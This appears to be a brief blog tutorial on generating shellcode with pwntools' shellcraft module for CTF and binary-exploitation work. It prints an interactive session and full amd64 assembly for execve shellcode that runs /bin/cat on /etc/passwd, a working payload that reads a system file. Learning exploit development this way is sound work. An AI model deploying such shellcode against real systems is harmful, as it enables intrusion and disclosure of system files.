Most of the time while im dealing with binary exploitation I need shellcode’s generated on the fly, so I don’t waste time and creativity. I prefer using pwntools most of the time for these kind of tasks. Especially the shellcraft module. Shellcraft module allows us to write assembly code using python based on the system call instructions that we give or select to it.

What is pwntools?

pwntools is a CTF framework and exploit development framework library written in python. Which is designed to be simple, fast and too effective

Shellcraft has tons of system calls that we can use to generate shellcode’s based for our needs. But what we need most of the time is a simple execve or sh spawner.

>>> dir(shellcraft) ***REDACTED*** ‘execve’, ‘exit’,’setuid’, ‘setuid32’, ‘setxattr’, ‘sgetmask’, ‘sh’, ‘shmat’, ‘shmctl’, ‘shmdt’, ‘shmget’, ‘shutdown’, ‘sigaction’, ‘sigaltstack’, ‘signal’, ‘signalfd’, ***REDACTED*** ‘wait4’, ‘waitid’, ‘waitpid’, ‘write’, ‘writev’, ‘xor’] >>> from pwn import * >>> context.clear(arch=’amd64’) #Selecting the architecture in my case amd64 (64bit)

Most of the time I use execve as a system call to read the /etc/passwd file

>>> sc = shellcraft.execve(path=”/bin/cat”, argv=[“/bin/cat”, “/etc/passwd”])

Use the right path of the binary that we want to use with the execve system call

In order to see how the shellcode is looking in asm way

>>> print shellcraft.execve(path=”/bin/cat”, argv=[“/bin/cat”, “/etc/passwd”])

/* execve(path=’/bin/cat’, argv=[‘/bin/cat’, ‘/etc/passwd’], envp=0) */

/* push ‘/bin/cat\x00’ */

push 1

dec byte ptr [rsp]

mov rax, 0x7461632f6e69622f

push rax

mov rdi, rsp

/* push argument array [‘/bin/cat\x00’, ‘/etc/passwd\x00’] */

/* push ‘/bin/cat\x00/etc/passwd\x00’ */

push 0x64777373

mov rax, 0x101010101010101

push rax

mov rax, 0x101010101010101 ^ 0x61702f6374652f00

xor [rsp], rax

mov rax, 0x7461632f6e69622f

push rax

xor esi, esi /* 0 */

push rsi /* null terminate */

push 0x11

pop rsi

add rsi, rsp

push rsi /* ‘/etc/passwd\x00’ */

push 0x10

pop rsi

add rsi, rsp

push rsi /* ‘/bin/cat\x00’ */

mov rsi, rsp

xor edx, edx /* 0 */

/* call execve() */

push SYS_execve /* 0x3b */

pop rax

syscall

To test it out on the go I use the built-in function run_assembly